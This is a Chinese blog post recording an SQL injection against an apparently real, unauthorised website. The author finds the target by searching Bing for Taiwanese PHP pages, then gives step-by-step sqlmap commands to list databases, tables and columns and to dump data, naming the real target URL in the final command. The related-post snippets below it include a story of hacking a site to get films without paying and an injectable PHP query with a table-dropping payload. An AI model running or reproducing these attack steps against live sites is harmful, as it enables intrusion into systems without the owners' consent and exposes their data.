记录一次对某网站的sql注入

已于 2022-09-16 19:41:02 修改
阅读量3.7k 收藏 50
点赞数 22
分类专栏: 网安 文章标签: sql 服务器 数据库
于 2022-09-16 19:40:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_67503304/article/details/126896249
版权
本文介绍了SQL注入的概念,详细阐述了其危害,包括数据泄漏、网页篡改等。并通过实例展示了如何使用sqlmap工具检测和利用SQL注入漏洞,从搜索、检测到数据导出的全过程。最后,强调了判断和防范SQL注入的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

📢📢📢📢📢📢
感谢您的观看,正在学习网安的各种知识,欢迎大家一起交流学习!

如果文章对您有所帮助,记得点个关注!!!
📣📣📣📣📣📣

目录

一,SQL注入是什么

 二,SQL注入危害

 三,对某网站的实测记录

1.使用bing搜索site:tw  inurl:php(site指定区域,inurl:url链接包含的内容)

 2.打开网站发现存在一个id=xxx可能存在一个sql注入漏洞

 3.使用sqlmap工具进行注入检测

 四,总结

一,SQL注入是什么

攻击者把 SQL 命令语句作为输入被服务器 SQL 解释器正确解析执行,数据库把查询到
的结果返回给服务器,然后呈现给攻击者,攻击者由此获得数据库内的数据信息。

 二,SQL注入危害

数据库信息泄漏:数据库中存放的用户的隐私信息的泄露。

网页篡改:通过操作数据库对特定网页进行篡改。

网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。

数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被窜改。

服务器被远程控制,被安装后门。经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统。

SQL注入是危害WEB安全的主要攻击手段,存在SQL注入攻击的网站一但被攻击成功
,产生的后果将有可能是毁灭性及不可恢复的。

 三,对某网站的实测记录

1.使用bing搜索site:tw  inurl:php(site指定区域,inurl:url链接包含的内容)

 2.打开网站发现存在一个id=xxx可能存在一个sql注入漏洞

 

 3.使用sqlmap工具进行注入检测

1)python sqlmap.py http://xxxxxx --batch    (batch采用默认配置对提示进行设置

发现存在一个get注入漏洞,那就可以直接进行get注入 

 

2)查看数据库信息

 python sqlmap.py http://xxxxxxxxxxxxxxx --batch --dbs

(--dbs获取对方数据库所有库的名称)

 发现存在两个数据库

 

3)查看数据库中所有表

python sqlmap.py http://xxxxxxxx --D information_schema --tables

获取information——schema库下的表)  

 4)查看表中的字段

python sqlmap.py http://xxxxxxxx --D information_schema -T USER_PRIVILEGES --columns

获取information_schema表,T USER_PRIVILEGES表中的字段) 

 

 5)爆破users表中特殊字段的信息

python sqlmap.py http://www.diffuser.com.tw/page.php?id=116 --batch -D information_schema -T USER_PRIVILEGES -C "GRANTEE,PRIVILEGE,IS_GRANTABLE,TABLE_CATALOG" --dump
(导出数据指定的数据)

 四,总结

根据客户端返回的结果来判断提交的测试语句是否成功被数据库引擎执行,如果测试
语句被执行了,说明存在注入漏洞
按参数类型分类,发现该网站输入数字型注入

一次系统被sql注入搞挂的惨痛经历
lisu061714112的专栏
04-22 2919
前言 最近我在整理安全漏洞相关问题,准备在公司做一次分享。恰好,这段时间团队发现了一个sql注入漏洞:在一个公共的分页功能中,排序字段作为入参,前端页面可以自定义。在分页sql的mybatis mapper.xml中,order by字段后面使用$符号动态接收计算后的排序参数,这样可以实现动态排序的功能。 但是,如果入参传入: id; select 1 -- 最终执行的sql会变成: select * from user order by id; select 1 -- limit 1,20 –会把后面
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
热门推荐
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
一次成功的sql注入入侵检测附带sql性能优化
09-11
很多同学和园友都遇到过sql注入的,其中大部分都是代码的不严谨造成的,都是犯过很多错误才学会认真起来
3-1SQL注入网站实例:注入步骤
小王的储物间
03-20 2025
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
网站篡改入门,一个SQL注入漏洞就能让整个网站大变样,原理详解!从SQL注入到XSS攻击,完整还原黑客是如何篡改网站
最新发布
Cairo_A的博客
04-03 580
通过 SQL 注入和 XSS 漏洞,我们可以实现对网站内容的篡改。在实际测试中,手动操作更能帮助您理解漏洞原理,提升技术水平。
SQL注入网站入侵实例
得峰的专栏 [网络收藏]
05-04 1799
这几天闲得无聊,想上网Down几部电影来看,找了找都是要Money的,不爽,花时间跑去汇钱还不如找个有漏洞的黑一黑。于是,计划开始:(为避免不必要的误会,网址、用户名、密码做了一些修改,不过方法是100%原汁原味)  1.寻找入口  准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示息。  尝试几个有传入参数的页面,逐个测试是否有SQL
一次SQL注入
weixin_70770389的博客
03-24 199
小白初试
一次简单的SQL注入
he320631127的博客
08-06 611
参考:http://103.238.227.13:10083/ bugku 可以看到编码是gb2312 测试注入点 id=1和id=1‘ 都没错 应该是宽字节注入,在试试 id=%df’ 报错 接着来 输入字段id=%df’ union select 1,2 %23 查看数据库的名 查看要找的key表里面的string ...
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 1336
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
sql注入靶场通关
xiaoyang0475的博客
07-03 1394
打开小皮,并打开Apache2.4.39 和 MySQL5.7.26打开网站创建网络 域名为sqli-labs 端口为8989 PHP版本5.3.29 根目录与WWW文件在同一路径,进行创建。打开创建好的网站打开网站就可以进行sqli-labs靶场通关啦接下来让我们开始进行打靶吧!输入正常数据查看回显通过判断是否存在注入点和注入类型来进行打靶判断注入?id=1查看是否存在注入点确定存在注入点将后面进行释查看页面回显页面回显正常判断注入方式为字符型注入
【PTE】SQL注入(一)
HkD01L的博客
11-10 854
CISP-PTE国家息安全渗透测试工程师课程笔记SQL注入 、联合查询注入、二阶注入、报错注入
SQL注入网站详解
12-12
SQL注入网站详解
一次简单的sql注入
weixin_30550081的博客
02-09 140
什么是sql注入攻击? 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。 1.判断注入点是否有效 sqlmap -u "http://xxx.xxx....
SQL注入入侵动网站(MSSQL)
weixin_34138056的博客
01-26 273
编辑前言:   这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个sqlserver库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据库结构,和程序运作方法。在一步步的攻击中取得管理权限,再一步步的提升权限,如果正好数据库用的是sa帐号,就更是麻烦了。   正是由于这些条件的假设,所以大家也不用太紧张,这里提供的是很多...
一次手动SQL注入
weixin_33874713的博客
03-23 211
1、检测到可能存在注入漏洞的url 最常用的 ‘ ,and 1=1 ,and 1=2 http://www.xxx.com/subcat.php?id=1 2、判断字段个数 http://www.xxx.com/subcat.php?id=1 order by 1 发现只有一个字段 3、查看数据库名 http://www.xxx.com/subcat.php?id=1 union select d...
一次艰难的SQL注入(过安全狗)
白帽子凯哥聊黑客
05-29 1705
实战注入的难度比靶场大得多,各种绕过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
一次sql注入实践
程序男的专栏
03-01 572
今天开发代码的时候发现自己的sql全是拼接的,不是where a = ?的那种,细思恐极啊,于是进行了一场sql注入实践。虽然失败了,但是还是得出了一些宝贵的经验。 首先从一个基础的分页查询语句开始分析: Select r.a,r.b  from role r where r.name like ‘role%’  order by r.create_time desc liimit 0,10;说明...
记录一次lmxcms审计sql注入到rce审计全过程
weixin_64683116的博客
02-12 1309
欢迎各位师傅关我的个人公众号: Gat4by前言:马上过年了就要忙起来了,后面大年初一初二可能没时间玩电脑了,趁着这几天手感火热,审一审比较著名的梦想cms。项目源码: http://www.lmxcms.com/down/安装好了这个cms后台进去长这样,看着这界面写的挺糙的,一眼满是漏洞的感觉,今天来审计练习一下RCE漏洞。我审计PHP的CMS的RCE的思路就是先去找是否有eval()函数的存在,先来一手全局查找eval()函数,接着我们锁定eval()函数中是变量而不是预定义常量的。于是来到一处ev
一次SRC实战-SQL注入
YINGXXX123的博客
01-28 909
前端输入字段,后端会运行SQL语句返回数据。数据库大都是支持SQL语言的,SQL语言本身是有预留关键字的,比如常用的select、update、delete等。故意输入非正常的SQL查询语句,由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,没有执行相关验证,用户可以提交一段非法的数据库查询语句,根据程序返回的结果,获得某些他想得知的数据,轻者程序错误,代码泄露,重者直接暴库,甚至危及服务器整体安全,这就是SQL注入攻击。
写一个存在sql注入漏洞的简易网页
11-09
我不建议创建或提供任何包含SQL注入漏洞的示例,因为这种行为不仅违反了网络安全的最佳实践,而且可能导致数据泄露、系统损坏等问题。SQL注入是一种常见的Web应用程序安全威胁,它允许恶意用户通过输入恶意的SQL代码来操纵数据库。 然而,为了帮助你理解潜在的问题,我可以解释一下什么是SQL注入及其防范措施。如果你有一个简单的HTML表单,可能存在注入风险的查询可能是这样的: ```html <!-- 假设这是一个搜索表单 --> <form action="search.php" method="get"> <input type="text" name="query" /> <input type="submit" value="搜索" /> </form> ``` 在`search.php`中,如果直接将用户输入拼接到SQL查询中,例如: ```php <?php $query = $_GET['query']; $sql = "SELECT * FROM products WHERE name = '$query'"; $result = mysqli_query($conn, $sql); ?> ``` 这里就存在SQL注入漏洞,攻击者可以输入像 `'; DROP TABLE products;--` 这样的字符串来破坏数据库结构。 正确的做法是使用预处理语句(Prepared Statements)或参数化查询来防止SQL注入,比如在PHP中: ```php $stmt = $conn->prepare("SELECT * FROM products WHERE name = ?"); $stmt->bind_param("s", $query); $stmt->execute(); $result = $stmt->get_result(); ```
评论 21
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

干掉芹菜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值